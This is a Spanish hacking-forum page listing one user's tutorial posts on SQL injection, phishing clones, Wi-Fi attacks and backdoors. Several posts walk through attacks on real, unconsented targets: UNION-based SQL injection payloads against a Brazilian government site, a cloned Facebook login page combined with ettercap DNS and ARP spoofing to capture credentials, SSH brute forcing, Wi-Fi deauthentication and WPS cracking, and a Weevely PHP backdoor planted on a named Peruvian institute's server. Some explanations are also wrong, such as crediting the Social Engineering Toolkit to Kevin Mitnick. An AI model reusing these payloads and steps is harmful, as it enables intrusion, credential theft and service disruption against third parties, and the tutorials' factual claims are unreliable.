Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - OswireW0rding

Páginas: [1]
1
Bugs y Exploits / Inyección SQLi Manual Metodo (POST)
« en: Marzo 16, 2014, 02:53:46 pm »
Hola amigos y lectores interesados en aprender...., en este post les vengo a explicar como explotar una Base De Datos manualmente pero esta vez no en metodo GET si no en metodo POST, y bueno se preguntarán.

¿Como qué en metodo Post?

Pués esta vez para utilizar este metodo necesitariamos el complemento add-nos para Mozilla Firefox (Live HTTP Headers), este complemento lo que hace es capturar las cabeceras y el tráfico de donde nosotros hemos entrado además también podremos ver nuestras cookies, bueno empezemos como verán mi victima será la web del gobierno de Brasil pero no la mostrare ya por seguridad.

Bueno entonces comenzemos como explique antes, para este metodo necesitariamos alguna barra de busqueda para comenzar a consultar la base de datos, bueno entonces como podrán ver encontre una barra de busqueda entonces en esa barra colocare cualquier número y nos aparecerá lo siguiente en el complemento add-nos Live HTTP Headers.




Okey y como ven nos ha capturado la cabeceras y ahora haremos lo siguiente, en la primera barra donde aparecera la URL daremos a repetir y nos aparecerá lo siguiente.




Bueno y como vemos la repetición esta en contenido "POST", ahora como vemos en el contenido post nos apareció "busca=1", okey entonces colocaremos una tilde y veremos si es vulnerable o no.




Y como podremos ver es vulnerable la website !, ahora colocaremos lo siguiente para comenzar a consultar la base de datos, comenzaremos colocando "order by unnúmero--+" donde dice unnúmero es donde elegiremos cualquier número que nosotros queramos otra cosa para saber si esta es la columna o no es la columna a veces nos aparecerá nada, algunas otras veces nos aparecerá error algunas otras veces nos aparecerá "Unkown Column" y cuando es la columna pués no tiene que aparecer el complemento completo de la página web, bueno comenzemos colocando "order by 8--+"



Bueno y como vemos no es la columna ahora probemos con "order by 7--+" haber si esta es la columna.



Y como vemós esta si es la columna !, ahora pondremos lo siguiente para que nos comienze a dar las consultas de la base de datos, colocaremos "union select 1,2,3,4,5,6,7--+" sin las comillas y nos aparecerá lo siguiente.




Y como vemós nos apareció el número "2" entonces ese es el que elegiremos para comenzar a consultar la base de datos, entonces borraremos el número "2" y pondremos lo siguiente.

Código: [Seleccionar]
union select 1,group_concat(0x3c62723e,table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--+



Y como verán en la imagen esas son las tablas de la base de datos, ya casi llegamos al último paso, bueno entonces elegiremos la tabla "categorias" para evitarnos problemas al públicar los datos del administrador, okey entonces ahora haremos pondremos lo siguiente.

Código: [Seleccionar]
union select 1,group_concat(0x3c62723e,column_name),3,4,5,6,7 from information_schema.columns where table_name=0x63617465676f72696173--+
Como verán el 0x no significa nada pero el "63617465676f72696173" es el nombre de categorias y como lo encodie, pués muy fácil como se me habia olvidado antes también necesitariamos el complemento HackBar, y en que parte de la sección lo encodeo?, pués muy fácil les pasaré una imagen de la sección.



Le daremos click pondremos el nombre de la tabla y listo estará encodeado, bueno ahora siguamos, colocamos lo que escrbí y nos quedaría así.





Y como vemos nos ha aparecido las columnas de la tabla categorias (id, nome), y como vemos en la imagen solo hay dos entonces pondríamos lo siguiente para completar el resultado de las consultas al sacar la base de datos.

Código: [Seleccionar]
busca=1' union select 1,group_concat(0x3c62723e,0x3d,id,0x3d,nome),3,4,5,6,7 from categorias--+



Y como vemos nos ha sacado la información de la columna !, otra cosa el "0x3d" no significa nada más bien es un código que nos sirve para sacar la información., bueno entonces esto sería todo, hasta la próxima !.

2
Hacking / Solución de error wireshark (Interfaces)
« en: Marzo 15, 2014, 08:41:22 pm »
Hola amigos y lectores, en este post ya que es corto super corto les vengo a explicar como solucionar el error de wireshark al no detectar los interfaces, primero lo primero se preguntarán.

¿Qué es wireshark?

WiresHark es una plataforma que se basa en capturar los paquetes de red y el tráfico recorriendo atravéz de cualquier interface puede ser eth0, wlan0, etc, si nosotros de casualidad elegiremos el interface eth0 solo nos capturara nuestro tráfico pero si elegiremos el interface wlan0 capturara los paquetedes de red y tráfico de los equipos que estarán conectados a nuestra red Wi-Fi, bueno comenzemos.

Al iniciar wireshark algunos cuando lo recien instalarón nos aparecerá este error.



Al no nos detectar los interfaces eso significa que no es normal pero pondríamos lo siguiente en la terminal.

Código: [Seleccionar]
sudo chgrp adm /usr/bin/dumpcap
sudo chmod 750 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin+eip /usr/bin/dumpcap

Entonces después de que pondriamos los comandos en la terminal nos aparecerá ya los interfaces ojo otra cosa el comando "sudo" es para los sistemas operativos que no tienen privilegios root, algunos otros sistemas operativos tendrían privilegios root y no es necesario colocar sudo, entonces como les escribí antes nos aparecerá los interfaces.



Bueno entonces esto sería todo, adios y a la próxima !.

3
Hacking / Escaneo de puertos TCP mediante metasploit
« en: Marzo 15, 2014, 03:23:38 pm »
Hola amigos y lectores, en este post hoy les vengo a explicar como usar el auxiliary scanner de tcp para escanear puerto, primero lo primero, se preguntarán.

¿Qué es TCP?

TCP(Transmission Control Protocol / Protocolo de Control de Transmisión), esta orientado a la conexión, se basa en el mapeo de puertos también se encarga de fraccionar una información en datagramas (paquetes) cuando una persona se conecta con algún servidor web.

Bueno comenzemos, primero lo primero sería abriendo nuestra consola de metasploit framework y colocando lo siguiente para comenzar a escanear nuestros puertos TCP/IP o alguna otra dirección Ip, antes de nada TCP/IP fue creada por el departamento de DoD(Departament Of Defense) si es que me acuerdo Jeje "TCP/IP" se basa en cualquier conexión de cualquier máquinas(En Plural), bueno entonces comenzariamos colocando "search portscan" sin las comillas y nos aparecerán los siguientes auxiliarys scanners.



Y como veremos nos aparecerán estos auxiliarys de donde les muestro en la imagen, en total hay "8" auxiliarys y solo seleccionaremos uno de ellos, seleccionariamos este auxiliary.

"auxiliary/scanner/portscan/tcp" , entonces pondríamos lo siguiente para estar ya dentro del auxiliary.

use auxiliary/scanner/portscan/tcp le daríamos enter "entrar" y listo ya estaríamos dentro del auxiliary, ahora colocaríamos lo siguiente "show options" para ver las opciones que tendremos del auxiliary.



Seleccionaríamos las siguientes opciones.

set RHOSTS Ip Pública o privada o puede ser de la victima <- no mostraré la dirección ip por seguridad
set THREADS 100 <-- número total de segundos de escaneos TCP
set PORTS <- podremos elegir cualquier puerto ejemplo de 1 - 100000000
run <- comenzara a funcionar el axuiliary y comenzar a escanear los puertos.

Entonces después que colocaríamos las opciones nos comenzaría a escanear, y listo nos ha escaneo satisfactoriamente.



Y como verán no tengo ningún puerto TCP abierto, bueno esto fue todo espero que hallan entendido, hasta la próxima.

4
Hola amigos en este post les vengo a enseñar como usar Exiftool una herramienta de "código libre" diseñada y basada en sacar información, esta herramienta también se basa en FootPrinting, okey empezemos ante de todo respondere qué es MetaDatos y FootPrinting.

¿Qué es FootPrinting?

FootPrinting es un tipo de recolección de información ya sea pública o privada, ejemplo los tipícos "Anonymous" sacan archivos, videos, información,etc, por eso se llama FootPrinting por sacar información.

¿Qué son MetaDatos ?

"MetaDatos" son archivos "importantes" que se filtran automaticamente desde ordenadores o aparatos inteligentes, ejemplo me encontre un telefono olvidado en algúna fiesta y me lo robo, lo prendo me voy a fotos y veo imagenes del dueño esos son datos importantes ya qué puedo saber quién es el dueño para darle el telefono que dejo olvidado, okey entonces comenzemos por ahora ando en mi computadora ya qué mi laptop la tengo cargando y por eso usare BackTrack 5 R3 com máquina virtual.

Abrimos la terminal y pondremos lo siguiente:


cd /pentest/misc/exiftool/ y le daremos enter y listo estamos dentro del directorio y colocamos lo siguiente

./exiftool -a /root/Desktop/anime.jpg

Ojo "Desktop" significa escritorio y "anime.jpg" es el nombre qué le puse al archivo formato ".JPG" y le daremos enter y nos aparecera lo siguiente.

Foto:



Y como ven el día de modificación fue:

2014:02:15 20:37:56-05:00

información completa:

ExifTool Version Number         : 8.78
File Name                       : anime.jpg
Directory                       : /root/Desktop
File Size                       : 532 kB
File Modification Date/Time     : 2014:02:15 20:37:56-05:00
File Permissions                : rw-r--r--
File Type                       : JPEG
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95.
Image Width                     : 1366
Image Height                    : 1024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1366x1024

Bueno espero qué hayan entendido en este post corto, aquí les pasare el libro llamado "La biblia del FootPrinting" leansela es demasiado buena y entendible.

Link de descarga:

https://www.mediafire.com/?fqwnxlvzrahh97m

5
Hola amigos y lectores, en este post les vengo a explicar como utilizar el Menú de Sitio de Clonación, bueno ante de todo Social Engineering Toolkit es una herramienta de "Ingeniería Social" como su palabra lo dice se basa en muchos módulos y menús.

Social Engineering Toolkit se basa en muchos módulos y menús es una herramienta echa por "Kevin David Mitnick" un cracker buscado mundialmente buscado por el F.B.I a finales de los años 90 (1995), Social Engineering Toolkit se basa en las siguientes herramientas.

- Clonación de Websites.(NO-IP)
- Vulnerabilidades en Sistemas Operativos.


Bueno para decir la verdad esto son solos los menús que me se pero seguire leyendo sobre esta increible herramienta. En este módulo que usaremos se basa en la suplantación de dominios "NO-IP" (DNS) o viceversa, bueno comenzemos, primero tendríamos que abrir la herramienta Social Engineering Toolkit entonces la ubicación sería la seguiente.

BackTrack >> Explotation Tools >> Social Engineering Tools >> Social Engineering Toolkit >> set

O colocariamos lo siguiente en la terminal:

cd /pentest/exploits/set/
./set

Foto:



Y listo ya tendríamos la consola de Social Engineering Toolkit abierto ahora nos aparecería los siguientes menús.

Foto:




Entonces elegiriamos el Menú 1, entonces pondríamos el número "1" sin las comillas y le daríamos enter y nos aparecerán otros menús.

Foto:



Elegiríamos el menu número "2" sin las comillas y daríamos enter y nos aparecerá otros menus.

Foto:



Entonces elegiríamos el menu 3 y le daríamos enter y nos aparecerá los siguientes menus.

Foto:



Elegiríamos el menu 2 y nos aparecerá lo siguiente para comenzar a clonar un sitio web.

Foto:




Y nos dice que pongamos nuestra dirección Ip, como verán colocaremos nuestra Dirección Ip Local y no dirección Ip Pública y colocaríamos nuestra Dirección Ip y daríamos enter.

Foto:



Entonces clonarimos la website de facebook.com y le daríamos enter y nos quedaría así.

Foto:




Y listo como verán se ha inciado la clonación "OJO" este proceso solo sirve para los demás servidores que estan conectados a la misma red, entonces ahora haríamos lo siguiente, abririamos otra terminal o pestaña como ustedes quierán y colocaríamos lo siguiente:

gedit /usr/local/share/ettercap/etter.dns y le daríamos enter.

Foto:




Y como verán crearemos los siguientes parametros para ingresar el dominio y dirección ip.

Dominio.com A IP
*.Dominio A IP
www.dominio.com PTR IP

Donde dice dominio es obvio que hay pondremos el dominio que clonamos y la dirección Ip y daríamos a guardar, okey después de eso colocariamos para finalizar en la terminal:

ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //

Y daríamos enter para finalizar, ojo donde dice "Adaptador de red" pondriamos el interface de donde estamos conectados una red Local o red Wi-Fi.

Foto:



Y listo ahora colocaríamos en la URL "facebook.com" o nuestra dirección Ip que hemos colocado. sin las comillas y pondríamos nuestro correo y contraseña pero como verán colocare una contraseña falsa.

Foto:



Y como verán nuestra victima se ha echo login con su correo electrónico y contraseña, ojo también podremos clonar otros sitio web.

6
Hacking / Usando módulos auxiliarys SSH (SECURE SHELL) [1,2] Parte
« en: Marzo 11, 2014, 09:51:27 pm »

Hola amigos y lectores en este post les vengo a explicar como usar el módulo auxiliary que se tratá de scanners, es muy corto pero bueno sigamos, bueno entonces como decia antes "METASPLOIT" es una herramienta muy extensa de auxiliarys,exploits,payloads,enoders,nops y post y nos ayuda mucho a que entendamos sobres esos módulos de explotación. Primero lo primero se preguntarán.

¿Para qué sirven los Pyloads , Encoders , Nops , Auxiliarys , Post , Exploits ?

¿Que es Metasploit?

Metasploit es una herramienta muy extensa y útil para cualquier cosa programada en C#,PERL,ASP,PERL,etc, esta herramienta se basa en penetración, sistema wireless, escaneo de puertos, scanners,etc, se forma de "exploits, auxiliarys , nops , post , encoders , payloads " también les respondere que es cada uno de esos.

¿Qué es Exploit?

Como su palabra dice "explotar" alguna vulnerabilidad osea un "HUECO DE SEGURIDAD" para que entiendan mejor se basa en una mal programación del syntaxis osea que el programador es perezoso a su deber.

¿Qué son Payloads?

Para que entiendan mejor es una lista de códigos que se ejecutan remotamente.

¿Que es un Encoder?

Un "Encoder" como su palabra lo dice "Encodear" se trata de que el payload llegue a su destino y no a otra parte para ejecutar bien el payload y no nos de error en alguna otra forma.

¿Qué son Nops?

Los nops mantienen mantienen el tamaño absoluto del "Payload" y permite también que no nos de error al ejecutarlo.

¿Qué son Auxiliarys?

Auxilirys son "SCANNERS" que ya vienen incrustado en la herramienta metasploit, ejemplo podrían ser las siguientes.

- SSH(SECURE SHELL)
- VNC (VIRTUAL NETWORK COMPUTING)
- FTP (TRANSFERENCIAS DE FICHEROS)


Bueno ahora si comenzemos abriremos la terminal y colocamos "msfconsole" sin las comillas para comenzar abrir la consola de metasploit.
Foto:




Después que hayamos abierto la consola de metasploit colocaremos "search ssh_version" y nos aparecerán los siguientes módulos y auxiliarys.

Foto:





Entonces elegiremos el módulo auxiliary "auxiliary/scanner/ssh/ssh_version", este módulo les explicare es más para hacer un "REVERSE DNS" o conocido como "rDNS", bueno sigamos, después de esto colocariamos lo siguiente, otra cosa básicamente los servidores SSh(Secure Shell) obviamente tienen el puerto 22 activado, para saber que la website tiene el puerto 22 abierto lo escanearemos con la herramienta de Código Libre "NMAP" es relativamente muy buena, también se viene un post sobre cada comando y para que sirve, bueno entonces pondria la imagen de la website que tiene el puerto 22 abierto.

Foto:




El comando "-Pn" es para apresurar el proceso de escaneo de puertos, bueno entonces siguamos ahora si colocariamos lo siguiente en el módulo del axuxiliary "ssh_version", colocariamos lo siguiente.

Foto:



Módulo:

set RHOSTS Ip Victima/22 -> es importante coloar /22 por que el servidor tiene el puerto 22 abierto
set RPORT 22 -> para fijar que tiene el puerto 22 abierta
set threads 100 -> encontrar servidores 100 veces por segundo

Y como verán ya se nos ha escando los servidores, en en la 2 parte les explicare sacar el "usuario" y la "contraseña" del servidor, entonces nos quedaría así al escanear.

Foto:



Bueno ahora vamos a la segunda parte   :) .
Y ahora como veo no les explique que es una conexión SSH.

¿Que es una conexión SSH?

SSH por su palabra lo dice en español (Shell Seguro) es una de la muchas plataformas que nos permiten conectarnos desde un sistema operativo GNU/LINUX desde windows, pero para esto necesitariamos la herramienta PuTTY. "PuTTY" es una de las herramientas que nos permiten conectarnos a los sistemas operativos GNU/LINUX, ojo pero para esto necesitariamos que tengamos la conexión SSH activada, algunos Sistemas Operativos GNU/LINUX tendrían ya la herramienta instalada e incrustada algunos no y tendrían que instalarla, bueno vamos a ello, de nuevo como les escribi antes usare mi máquina virtual BackTrack 5 R3, lo primero tendriamos que abrir la consola "Metasploit Framework" para comenzar a utilizar este scanner auxiliary, entonces colocaríamos "msfconsole" sin las comillas y daríamos enter, okey y después que se nos habra abierto la consola colocaríamos "search ssh_login" sin las comillas y nos aparecerán los siguientes módulos, ante de todo también esta herramienta se basa en brute force que en español significa "FUERZA BRUTA", fuerza bruta se basa en buscar en distintos diccionarios las contraseñas como en ocasiones de fuerza bruta a conexiones WPA/WEP, es muy peligroso la fuerza bruta por que en algunas conexiones no todas pueden haber archivos importantes, como classificaciones escolares,fotos,etc.


Foto:



Como verán yo tengo desactualizado metasploit pero para los que estarán viendo este post tendrían mas módulos, bueno entonces utilizariamos el módulo "auxiliary/scanner/ssh/ssh_login" y colocaríamos lo siguiente.

use auxiliary/scanner/ssh/ssh_login
show options -> show options es para ver las opciones que tendríamos que elegir.

Foto:



Bueno entonces elegiriamos las siguientes opciones no todas.

set USERNAME
set STOP_ON_SUCCESS
set RHOSTS
set RPORT
set THREADS
exploit

okey entonces pondriamos así.

set USERNAME informix <- nombre de la máquina OS GNU/LINUX
set STOP_ON_SUCCESS true <-  es necesario poner true(verdadero) para que nos funcione el proceso
set RHOSTS ipvictima <- Colocaríamos la Ip de nuestra victima osea el OS(SISTEMA OPERATIVO)
set RPORT 22 <- es obvio que los sistema SSH/SECURE SHELL tiene el puerto 22 abierto
set THREADS 100 <- número de veces por segundos
exploit <- lanzamiento del scanner a funcionar osea "explotar"

Bueno entonces nos quedaría así.

Foto:



Y como veríamos se nos comenzo a scannear el auxiliary a la conexión SSH/SECURE SHELL/SHELL SEGURA, bueno después que el proceso se haya escaneo nos quedaría así.

Foto:



Y como verán se nos ha lanzado el usuario y password  :) !, bueno y como vierón es demasiado fácil utilizar estos scanners auxiliarys, bueno espero que hayan entendido y adíos.



7
Seguridad Wireless / Usando el módulo de websploit "WIFI/WIFI_DOS"
« en: Marzo 11, 2014, 07:19:18 pm »
Hola amigos de underc0de, en este post les vengo a explicar como denegar servicio a una red Wi-Fi con el módulo de websploit, primero se preguntarán.


¿Que es Websploit?

Websploit por ahora contiene 19 modulos por la actualizacion, modulos de explotacion, modulos de Wi-Fi y modulos de Red, pero por ahora utilizare un modulo de Wi-Fi. Okey entonces comenzemos, abriremos la terminal y colocaremos lo siguiente para encender nuestra tarjeta de red en modo monitor, pero antes de nada la tarjeta de red no viene incrustada ahy que comprarla pero por suerte mia mi laptop ya viene incrustada la tarjeta de red, okey entonces colocamos lo siguiente en la terminal.

airmon-ng start wlan0
Foto:



Okey para ver las interfaces de la tarjeta de red en modo monitor colocaremos.

iwconfig
Foto:





Okey entonces otra cosa no reconfundan vmnet1 y vmnet 8 ya que es mi maquina virtual, okey entonces ahora haremos lo siguiente con airodump-ng.

¿Que es airodump-ng?

Airodump-Ng basicamente se usar para capturar "PAQUETES WIRELESS" mediante las BSSID.

¿Que es BSSID?

BSSID(BASIC SERVICE SET IDENTIFICER) es un nombre de identificación del area local inalambrica de todos los paquetes. Mac ( Media Access Control) formado por 48 bits.

Okey entonces haremos lo siguiente.

airodump-ng mon0 y le daremos enter
Foto:



Okey como veran solo tenemos una red Wi-Fi ya que es la mia llamada "PIPE", okey entonces ahora haremos lo siguiente abrimos la consola websploit.

Foto:



Okey entonces ahora colocamos "show modules" sin las comillas y veremos lo siguientes modulos.
Foto:



Okey como les escribi antes yo elegire el modulo wifi/wifi_dos entonces colocariamos lo siguiente.

use wifi/wifi_dos
set bssid F8:C3:46:37:75:7F
set essid PIPE
run

Foto:



Y entonces nos comenzara a atacar nuestra red, okey cuando nos salga este error:

Código: [Seleccionar]
Traceback (most recent call last):
File "/usr/bin/websploit", line 147, in <module>
start()
File "/usr/bin/websploit", line 145, in start
main()
File "/usr/bin/websploit", line 119, in main
main()
File "/usr/bin/websploit", line 115, in main
wifi_dos.wifi_dos()
File "/usr/share/websploit/modules/wifi_dos.py", line 68, in wifi_dos
wifi_dos()
File "/usr/share/websploit/modules/wifi_dos.py", line 27, in wifi_dos
wifi_dos()
File "/usr/share/websploit/modules/wifi_dos.py", line 31, in wifi_dos
wifi_dos()
File "/usr/share/websploit/modules/wifi_dos.py", line 76, in wifi_dos
os.chdir("temp")
OSError: [Errno 2] No such file or directory: 'temp'

Este error sucede al no crear el directorio backlist, entonces haremos los siguiente en la terminal:

mkdir /root/temp && touch /root/temp/blacklist y le daremos enter y listo ya no nos aparecerá el error. Bueno espero que hallan entendido se que algunos se dirán que spammer es este chico, pero este post los que e echo son propios nada de "COPY&PASTE" solo sacados de mi blog ya que me gusta compartir de lo que he aprendido y leido en estos último 5 meses, tan solo soy un chico de 10 años que le gusta aprender  ;D, bueno entonces esto fue todo.

Adios ! .

8
Hacking / Usando la herramienta "Weevely"
« en: Marzo 11, 2014, 06:51:31 pm »
Hola amigos de underc0de  :), en este post les vengo a explicar como usar la herramienta llamada Weevely, bueno comenzemos primero se preguntarán.

¿Qué es weevely?

Weevely básicamente se usa para crear BackDoors en .PHP, esos backdoors se usan al subirlos a la web claro primeramente tendriamos que subir una Shell o no ahy problema si lo suben atravez de algún Upload e ir a la dirección de como llamaron el BackDoor, weevely mayormente se usa para una conexión remota al servidor igúal a la herramieta llamada "NetCat" que depronto en el próximo post les vendre a explicar cada uno de los comandos, weevely se usa para rootear servidores pero en este caso ya qué no tengo la versión del Local Root Exploit osea la versión del Kernel de la Website no sería un rooteo, bueno comenzemos, mi web victima sería la de una univerdad de Perú.



Okey y como verán tuve que borrar el Link completo de la Shell para evitar problemas, básicamente el pentest se basa en legal y también ilegal.

¿Por qué Legal?

Por que tendriamos la autorización del administrador de la web y podriamos hacer ciertas cosas y publicar las vulnerabilidades (HUECO DE SEGURIDAD) esto se basa como un white hat.

¿Por qué ilegal?

Por qué esta vez no tendriamos la autorización del administrador y podriamos hacer lo uno quiera a la página web, desconfigurarla esto se basa a un defacement, borrar la base de datos,etc, muchas cosas más podriamos hacer, esto es basa a un Black Hat.

Okey ahora haremos lo siguiente abrimos la terminal ya que yo uso Kali Linux una distribución muy buena basada en Debian, okey la abrimos y ponemos lo siguiente, colocamos weevely y dariamos enter.



Okey como podrán ver al ejecutar la herramienta Weevely nos aparecera una ciertas instrucciones para crear el BackDoor programado en PHP, entonces haremos lo siguiente antes de nada el nombre del BackDoor lo nombrare como "WhiteHat.php" y la contraseña será "WhiteHat123", okey entonces pondriamos lo siguiente:

weevely generate WhiteHat123 /root/Desktop/WhiteHat.php

Okey y como verán el root/Desktop/WhiteHat es la ubicación del BackDoor, y dariamos enter y nos aparecera lo siguiente.




Okey nos apareceió lo siguiente:

[generate.php] Backdoor file '/root/Desktop/WhiteHat.php' created with password 'WhiteHat123'

Esto significa que se nos ha creado el BackDoor en el escritorio satisfactoriamente, okey ahora vamos a la shell y subamos el BackDoor, y bien !! se nos ha subido el BackDoor satisfactoriamente.



Okey como verán entonces se nos ha subido el BackDoor sin problemas en el Upload de la Shell, okey como verán ahora, iremos al Link del BackDoor , okey como escribi entonces el link del BackDoor sería el siguiente.

http://institutoabat.edu.pe/images/WhiteHat.php

No nos aparecera nada ya qué es Normal así son los BackDoors, e igualmente al crear un BackDoor en la vulnerabilidad de Windows 7 al ejecutar el BackDoor no nos aparecera nada se ejecuta y no abre nada es igúal, okey entonces vamos a la terminal y colocamos lo siguiente

weevely http://institutoabat.edu.pe/images/WhiteHat.php WhiteHat123

Otra cosa recuerden que como escribi antes el WhiteHat123 es la contraseña del BackDoor y dariamos enter entonces y nos aparecera lo siguiente




Y como verán ya estamos dentro del servidor, okey entonces colocariamos id y uname -a para ver la versión del Local Root Exploit osea la versión del Kernel.

uid=1394(institut) gid=1382(institut) groups=1382(institut)

Está es la versión del Kernel del servidor:
Linux evop21.areserver.net 2.6.18-348.16.1.el5.028stab108.1 #1 SMP Tue Aug 27 13:02:53 MSD 2013 i686 i686 i386 GNU/Linux

Okey como verán la versión del Kernel no la tengo o si no les enseñaría en este mismo post a rootear un servidor pero lo importante es que hallan aprendido  :) , bueno esto fue todo y a la próxima, Bye!.

9
Hacking / Utilizando la herramienta Dmitry
« en: Marzo 10, 2014, 07:03:08 pm »
Hola amigos y lectores en este post, hoy les vengo a explicar como usar la herramienta Dmitry esta herramienta se basa en Footprinting también recoleción de información ya sea privada o pública, recolección de hosts,reverse dns,reverse ip,fotos , etc. Bueno empezemos en esta ocación usare mi máquina virtual donde tengo instalado la distribución BackTrack basada en Ubuntu, okey empezemos.

Primero abriremos la Terminal y colocaremos lo siguiente.

Dmitry y daremos enter y nos aparecerá las siguientes instrucciones.

Foto:



Okey entonces les traducire las intrucciones a español.

Traducción.

-o Guardar salida en% host.txt o para presentar el archivo especificado por-o
-i Realice una búsqueda whois en la dirección IP de un host
-w Realizar una búsqueda whois del nombre de dominio de un host
-n Recuperar información Netcraft.com en un host
-s Realizar una búsqueda de posibles subdominios
-e Realice una búsqueda de posibles direcciones de correo electrónico
-p Realice un puerto TCP escanear en un host
*-F Realice un puerto TCP escanear en un host que muestra informes de salida de los puertos filtrados
*-B Leer en el estandarte recibido desde el puerto escaneada
*-T 0-9 Ajuste el TTL en segundos al escanear un puerto TCP (por defecto 2)

Bueno entonces comenzemos como dice el comando "-o" guarda la información en archivo formato ".txt" entones mi web victima sería underc0de ya qué es el team en que estoy unido, entonces pondriamos lo siguiente.

dmitry -o www.underc0de.org

Foto:



Y nos aparecerá más información hay solo es un resumen de la información recolectada y si quieren ver la información recolectada estará guardada en Home Folder y la carpeta "ROOT" del sistema, okey entonces ahora pondremos el comando "-i" para que realice una busqueda del WHOIS en la dirección Ip de un host, entones colocariamos lo siguiente.

dmitry -i www.underc0de.org

Foto:



Después de sacar la dirección Ip en un host ahora pondremos el comando "-w" para realizar una búsqueda whois del nombre de dominio de un host, entonces pondriamos lo siguiente.

dmitry -w www.underc0de.org

Foto:



Okey ahora después de sacar realizar una búsqueda whois del nombre de dominio de un host , pondremos lo siguiente para recuperar información Netcraft.com en un host con el comando "-n" y pondriamos lo siguiente.

dmitry -n www.underc0de.org

Foto:



Como verán no tiene informacion netcraft, algunos se preguntarán.

¿Qué es Netcraft?

 Netcraft es una empresa mundialmente que ofrece alojamiento de servidores, ejemplo para crear foros,websites,etc.

Okey ahora de sacar la información Netcraft el comando "-s" para realizar una busqueda de los subdominios, entones pondremos lo siguiente.

dmitry -s www.underc0de.org

Foto:



Y como verán no hay subdominios alojados en el dominio pero si hacer este escaneo en google.com si les saldrá subdominios alojados, okey ahora después que escanemos posibles subdominios alojados en la web haremos lo siguiente para realizar una búsqueda de direcciones de correo electrónico en la website, entonces pondriamos lo siguiente con el comando "-e"

dmitry -e www.underc0de.org

Foto:



Y como verán no hay correos electrónicos posibles en la website alojada es algo raro por que he probado en otras webs y si hay pero bueno, ahora haremos lo siguiente con el comando "-p" para que realice un puerto TCP escanear en un host, entonces pondremos lo siguiente, este comando busca más y se basa en analizar los puertos que tienen abiertos.

dmitry -p www.underc0de.org

Foto:



Y como verán ya que el proceso se demora en escanear los puertos, bueno entonces esto fue todo espero que hayan entendido y adios  :) .

10
Seguridad Wireless / Crackear redes WPA/WPA-PSK(PRE SHARED KEY)
« en: Marzo 10, 2014, 03:34:38 pm »
Hola amigos y lectores de mi post, les vengo a explicar como crackear redes WPA-WPA-PSK(Pre Shared Key), okey comenzemos algunos se preguntarán.

¿Qué es REAVER?

Reaver es una herramienta de fuerza bruta para redes WPS (Wi-Fi Protected Setup).

Buen comienzo. En primer lugar lo que hacemos es encender nuestra tarjeta de red en modo de seguimiento, por lo que abrirá el terminal que uso Linux y Kali consiguieron como mi principal sistema operativo en la computadora portátil. Eso sería colocar:

Airmon-ng wlan0 empezar

Para iniciar la tarjeta de red en modo monitor, de la foto:



Ahora, como podemos ver en la foto, hemos puesto nuestra tarjeta de red en modo monitor, en este caso sería el mon0. 

Ahora utilizaremos la herramienta llamada wifite, wifite es una herramienta programada en Python echa básicamente para encontrar redes cercanas a cualquier zona Wi-Fi, okey entonces abrimos otra pestaña y colocamos wifite y damos enter.

Foto:



Como se puede ver en la imagen escaneamos 2 redes WPS (WiFi Protected Setup)

- PIPE

- Movistar

Pero por ahora voy a elegir la red Wi-Fi y PIPE xD ya qué es la mía, y ahora sabemos que es vulnerable a los ataques Reaver por que es una red WPS.

Ahora tendremos que averiguar el BSSID(BASIC SERVICE SET IDENTIFICER) para iniciar el escaneo de fuerza bruta ojo el escaneo se demorara entre 16 a 19 horas no estoy tan seguro pero funciona solo sirve para redes WPA-PSK(Pre Shared Key) red pre-compartida una red solo en casa, okey algunos se preguntarán.

¿Qué es BSSID(BASIC SERVICE SET IDENTIFICER)?

BSSID(BASIC SERVICE SET IDENTIFICER) es un nombre de identificación del area local(LAN) inalambrica de todos los paquetes. Mac ( Media Access Control) formado por 48 bits, del punto de acceso inalambrico, okey entonces colocacaremos en otra pestaña o terminal airodump-ng mon0 y le daremos enter.

Foto:




Como podemos ver en la imagen podemos ver la red BBSID que de las redes Wi-Fi, ahora que sacamos la BBSID podemos comenzar a usar el Reaver para empezar a hacer fuerza bruta a la red Wi-Fi, esta herramienta no es necesario utilizar ningún diccinario WPA-PSK antes WPA/WPA2 PSK diles que se trata de "una red ósea pre-compartida solo en casa" fuerza bruta esta herramienta se utiliza más para la recuperación de la contraseña si ha olvidado, pero si llegamos a olvidar es algo tonto, así siguamos ahora vamos a abrir otra terminal o pestaña y ejecutamos lo siguiente en el terminal:

reaver-i mon0-b F8: C3: 46:37:75:7 F-vv

Le daremos enter y nos aparecera lo siguiente:

Foto:



Y como podran ver en la imagen cuando ejecutamos el comando nos comenzara analizar y trabajar sola, pero ojo para esto necesitamos ser pacientes como escribi antes esto puede ser un proceso de hasta 16 horas o máximo 19 mejor dicho no estoy muy seguro, pero como podran ver no coloco la otra imagen ya con la contraseña y el PIN  ya que es por precaución, bueno espero que hayan entendido, Bye!.


11
Bugs y Exploits / Exploit Career jobs wordpress[SQLi]
« en: Marzo 10, 2014, 03:23:19 pm »
Hola amigos y lectores de este post, les explicare cómo explotar una Base de datos Manualmente en servidores WordPress, otra cosá no les servira usar Havij por qué no inyectara ni sacara la Base de Datos(BD), okey comenzemos.

Dork: inurl:career-details-/?jobid=

Primeramente todos se preguntarán.

¿Qué es SQLi?

La vulnerabilidad SQLi se conoce y es la más famosa desde los comienzo del internet es conocida como un "Hueco de Seguridad" muy peligroso para el administrador ya qué la página web puede tener datos importantes o Tarjetas de creditos estó a pasado y no es una leyenda estó a pasado al sacar la base de datos nos envian consultas qué nosotros podemos verlas al sacar la base de datos este error de programación es culpa del programador web que por que le pagaran mucho no programe bien la web la dejo a medias también a veces los programadores serian nuevos en esto y algunos perezosos, también se conocen otras vulnerabilidades como las siguientes.

- LFI( LIFE FILE INCLUSIÓN)
-RFI(REMOTE FILE INCLUSIÓN)
-CSRF(CROSS SITE REQUEST FORGERY)
